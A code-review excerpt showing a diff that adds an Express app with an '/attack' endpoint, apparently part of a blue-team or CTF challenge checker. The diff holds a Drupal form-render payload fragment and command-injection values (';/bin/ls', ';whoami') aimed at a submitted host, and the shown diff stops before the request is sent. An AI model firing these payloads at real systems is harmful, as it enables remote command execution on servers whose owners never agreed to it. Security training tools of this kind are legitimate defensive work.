bluetesterapp/index.js

```diff
@@ -0,0 +1,75 @@
+'use strict';
+
+const express = require('express');
+const bodyParser = require('body-parser');
+const axios = require('axios');
+const qs = require('qs');
+const path = require('path');
+const crypto = require('crypto');
+const app = express();
+const PORT = 8081;
+const HOST = '0.0.0.0'
+
+app.use(bodyParser.urlencoded({ extended: true }));
+app.use(express.static("views"));
+
+axios.defaults.headers.post['Content-Type'] = 'application/x-www-form-urlencoded';
+
+var masterSalt = "";
+masterSalt=process.env.MASTER_SALT;
+
+var dataCh1 = "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]="
+
+var dataCh21 = qs.stringify({
+	name: ';/bin/ls'
+});
+var dataCh22 = qs.stringify({
+	name: ';whoami '
+});
+
+app.get('/*',(req, res) => {
+	res.sendFile(path.join(__dirname, 'views/form.html'));
+});
+
+app.post('/attack',(req, res) => {
+	const attck = req.body.host;
+	const codeSalt = req.body.salt;
+	const challenge = req.body.radio;
+        var hash = crypto.createHash('sha256').update(codeSalt+masterSalt).digest('base64');
```

Comment:
We also need the challenge id. blue_ch1 and blue_ch2 respectively

Reply:
Yes! Added in the latest commit.